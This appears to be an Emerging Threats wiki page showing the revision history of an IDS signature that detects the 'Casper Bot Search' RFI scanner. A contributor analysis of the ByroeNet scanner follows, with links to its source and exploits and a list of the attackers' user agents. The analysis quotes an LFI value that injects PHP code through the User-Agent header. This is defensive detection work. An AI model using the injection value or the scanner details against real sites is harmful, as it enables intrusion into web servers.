alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER Casper Bot Search RFI Scan"; flow:established,to_server; content:"Casper Bot"; nocase; http_user_agent; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; sid:2011175; rev:7; metadata:created_at 2010_07_30, updated_at 2010_07_30;)

Added 2017-08-07 21:04:20 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Casper Bot Search RFI Scan"; flow:established,to_server; content:"User-Agent|3a| Casper Bot Search|0D 0A|"; fast_pattern:only; nocase; http_header; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; sid:2011175; rev:6;)

Added 2011-10-12 19:31:29 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Casper Bot Search RFI Scan"; flow:established,to_server; content:"User-Agent|3a| Casper Bot Search|0D 0A|"; fast_pattern:only; nocase; http_header; classtype:web-application-attack; reference:url,doc.emergingthreats.net/2011175; sid:2011175; rev:6;)

Added 2011-09-14 22:44:54 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Casper Bot Search RFI Scan"; flow:established,to_server; content:"User-Agent|3a| Casper Bot Search|0D 0A|"; fast_pattern:only; nocase; http_header; classtype:web-application-attack; reference:url,doc.emergingthreats.net/2011175; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_SERVER_Casper; sid:2011175; rev:6;)

Added 2011-02-04 17:30:56 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Casper Bot Search RFI Scan"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_SERVER_Casper; sid:2011175; rev:4;)

Added 2010-07-29 22:04:59 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Casper Bot Search RFI Scan"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_SERVER_Casper; sid:2011175; rev:4;)

Added 2010-07-29 22:04:59 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN Casper Bot Search RFI Scan"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Casper; sid:2011175; rev:5;)

Added 2010-07-29 19:30:58 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET SCAN Casper Bot Search RFI Scan"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Casper; sid:2011175; rev:5;)

Added 2010-07-29 19:30:58 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Casper Bot Search RFI Scan"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_SERVER_Casper; sid:2011175; rev:4;)

Added 2010-07-29 14:16:22 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET WEB_SERVER Casper Bot Search RFI Scan"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SERVER/WEB_SERVER_Casper; sid:2011175; rev:4;)

Added 2010-07-29 14:16:22 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET USER_AGENTS Casper Bot Search RFI Scan"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Casper; sid:2011175; rev:3;)

Added 2010-07-26 11:52:24 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET USER_AGENTS Casper Bot Search RFI Scan"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase; reference:url,doc.emergingthreats.net/2011175; classtype:web-application-attack; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENTS_Casper; sid:2011175; rev:3;)

Added 2010-07-26 11:52:24 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET USER_AGENTS Casper Bot Search RFI Scan"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase; reference:url,doc.emergingthreats.net/2011175; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENT_Casper_RFI_Bot; classtype:web-application-attack; sid:2011175; rev:2;)

Added 2010-07-08 19:31:10 UTC

Just to provide you more informations about these casper user agents.

These user agent are hard coded into the "ByroeNet" scanner dated from 17/06/2010

Source code of the scanner. http://pastebin.com/zBUHC3d9

The scanner is an evolution of the BaMbY? scanner dated from 28/05/2010 http://novie.fileave.com/rfi.txt

This new scanner was first seen on Internet the 17 Jun 2010 on t7.fileave.com/e107.txt, directly exploited after his creation.

http://www.google.com/search?q=%22%24powered%3D%22ByroeNet%22%3B%22&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:fr:official&client=firefox-a

More precisely this scanner is integrating in his "normal functionalities" a new functionality : e107 scanner.

The e107 (cmde107 - e107scan) scanner, with support of dorks, is trying to exploit the 24 May 2010 RCE discovered vulnerability. http://www.exploit-db.com/exploits/12715/

But between his traditional RFI scanner and dorks, the scanner could also exploit the 31 May 2010 LFI discovered vulnerability. http://www.exploit-db.com/exploits/12818/

The ByroeNet? scanner is defining different user agents by default how are customisable

For sub cmdxml : my $userAgent = LWP::UserAgent->new(agent => 'perl post');

For sub cmde107 : $access->agent("Mozilla/5.0");

For sub e107scan : $ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS? 5.7 sun4u)');

For sub xmlcek : my $userAgent = LWP::UserAgent->new(agent => 'perl post');

For sub xmlxspread : my $userAgent = LWP::UserAgent->new(agent => 'perl post');

For sub lfiexploit : Normal for /proc/self/environ exploitation my $agent = "";

For sub cmdlfi : Normal for /proc/self/environ exploitation my $hie = "j13mbut /dev/stdout\"); ?>j13mbut"; $browser->agent("$hie");

After investigating my Honey Net weblogs for a period of one month, I got these different user agent targeting e107 exploits :

http://eromang.zataz.com/uploads/e107_user_agents.txt

You can find the default configured user agents : Mozilla/5.0 Mozilla/4.76 [ru] (X11; U; SunOS? 5.7 sun4u) perl post

But also Casper user agents : Casper Bot Search MaMa? CaSpEr?

And some new user agents : b3b4s Bot Search dex Bot Search Dex Bot Search kmccrew Bot Search plaNETWORK Bot Search rk q kangen sasqia Bot Search sledink Bot Search

As you can see the user agents are only reflecting the "Crew" or "Team" how is using the "ByroeNet" scanner.

Here some stats for the user agents :

http://eromang.zataz.com/2010/07/13/byroenet-casper-bot-search-e107-rce-scanner/

Casper Bot Search is really the more prolific user agent, but the others user agents must also be considered.

For conclusion, the mutation of traditional RFI scanner is clearly demonstrated, and I don't think that such ET rules are really effective,

cause each "Crew" or "Team" is dedicating they attacks by customising the user agents (same as a graffiti tagger).

Emerging Threats rules shouldn't not focus on user agents but more on attack vectors, cause user agents are to volatile.

Regards.

-- MattJonkman - 14 Jul 2010


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET USER_AGENTS Casper Bot Search RFI Scan"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; nocase; reference:url,doc.emergingthreats.net/2011175; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENT_Casper_RFI_Bot; classtype:web-application-attack; sid:2011175; rev:2;)

Added 2010-07-08 19:31:10 UTC


alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"ET USER_AGENTS Casper RFI Bot Search"; flow:established,to_server; content:"|0D 0A|User-Agent|3a| Casper Bot Search|0D 0A|"; reference:url,doc.emergingthreats.net/2011175; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/USER_AGENTS/USER_AGENT_Casper_RFI_Bot; classtype:web-application-attack; sid:2011175; rev:1;)

Added 2010-07-08 19:16:03 UTC


Topic revision: r2 - 2010-07-14 - MattJonkman
 
This site is powered by the TWiki collaboration platform Powered by Perl This site is powered by the TWiki collaboration platformCopyright © Emerging Threats